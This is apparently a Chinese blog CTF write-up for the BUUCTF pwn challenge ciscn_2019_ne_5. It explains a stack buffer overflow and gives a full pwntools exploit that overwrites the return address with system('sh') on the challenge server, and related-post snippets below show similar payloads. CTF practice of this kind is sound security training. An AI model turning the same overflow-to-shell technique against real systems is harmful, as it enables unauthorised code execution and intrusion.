[BUUCTF]PWN——ciscn_2019_ne_5

最新推荐文章于 2023-04-07 16:09:30 发布
最新推荐文章于 2023-04-07 16:09:30 发布
阅读量1.9k 收藏 5
点赞数 8
分类专栏: PWN BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/108914595
版权

ciscn_2019_ne_5

题目附件

步骤:

例行检查,32位,开启了nx保护
在这里插入图片描述
试运行一下程序,看一下程序的大概执行情况
在这里插入图片描述
32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串
在这里插入图片描述
双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag
在这里插入图片描述
看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞
在这里插入图片描述
根据之前那个flag的提示,之后我们应该选1,添加一个log,之后应该选4去调用getflag,然后结束程序
在这里插入图片描述
在这里插入图片描述
搞清楚程序逻辑后尝试构造payload,主要是利用选择1之后的那一次输入,a1就是外面的src,程序给的大小是48,这边读入的时候读入了128长度的字符串,可以造成溢出,将程序的返回地址覆盖成system(‘/bin/sh’),然后选4去调用读取我们构造好的栈,获取shell

之前查看字符串的时候,看到了程序里有用system函数,这边直接用sym去获取它的地址

system_addr=elf.sym['system']

尝试用ROPgadget来搜索一下程序里的’/bin/sh’字符串的地址的,没有找到,但是发现有‘sh’字符串,这个效果和‘/bin/sh’是一样的效果
在这里插入图片描述

shell_addr=0x80482ea

这样我们就可以构造我们的payload=‘a’*(0x48+4)+p32(system_addr)+‘aaaa’+p32(shell_addr)
之后选4去调用我们的这个构造好的栈即可获取shell

完整exp

from pwn import*

r=remote("node3.buuoj.cn",27108)
elf=ELF('ciscn_2019_ne_5')
system_addr=elf.sym['system']
shell_addr=0x80482ea

r.recvuntil('Please input admin password:')
r.sendline('administrator')

r.recvuntil('0.Exit\n:')
r.sendline('1')

payload='a'*(0x48+4)+p32(system_addr)+'1234'+p32(shell_addr)

r.recvuntil('Please input new log info:')
r.sendline(payload)

r.recvuntil('0.Exit\n:')
r.sendline('4')

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 201
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 732
[buuctf]ciscn_2019_n_5
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1467
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUUCTF pwn——ciscn_2019_n_5
CNS-Enterprise BCC-1701-J
04-07 179
BUUCTF 做题练习
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 532
ciscn_2019_ne_5 BUUCTF
BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 171
BUUCTFPWNciscn_2019_ne_5
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 786
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 552
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1006
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1208
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
ciscn_2019_n_5
qq_39869547的博客
01-11 956
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
ciscn_2019_ne_5
z1r0的博客
12-05 102
ciscn_2019_ne_5 查看保护 密码已经给了我们,直接上去然后就看见了三个选项,没有4,ida之后才看见了。 看一下add和getflag这两个函数 add这里的a1就是main中的src。 getflag中将src给copy到dest中,dest离ebp有0x48大小。而src离ebp有0xfc个大小,可以通过add写入rop的payload,然后让getflag来执行这个rop。这题可以正常的ret2libc也可以ret2text,这题的shell是/sh,一开始年朝着/bin/sh
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 311
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
buuctf pwn 第五空间决赛pwn5
最新发布
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值